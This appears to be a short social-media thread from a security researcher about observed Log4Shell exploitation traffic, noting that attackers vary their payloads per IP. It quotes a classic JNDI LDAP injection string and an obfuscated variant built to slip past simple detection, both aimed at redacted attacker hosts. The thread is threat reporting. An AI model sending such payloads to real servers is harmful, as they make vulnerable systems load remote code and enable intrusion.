Conversation

On the other hand, number of distinct IPs is roughly stable. The increase of malicious requests/IP can be explained by the fact that IPs are trying different payloads.
Image
1
Not only do they try the classical ${jndi:ldap://xx.xx.com:xx/xx}, they also encode/modify their payloads to try to bypass most simple detection techniques, e.g. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.xxxx.xxx.com}
1
2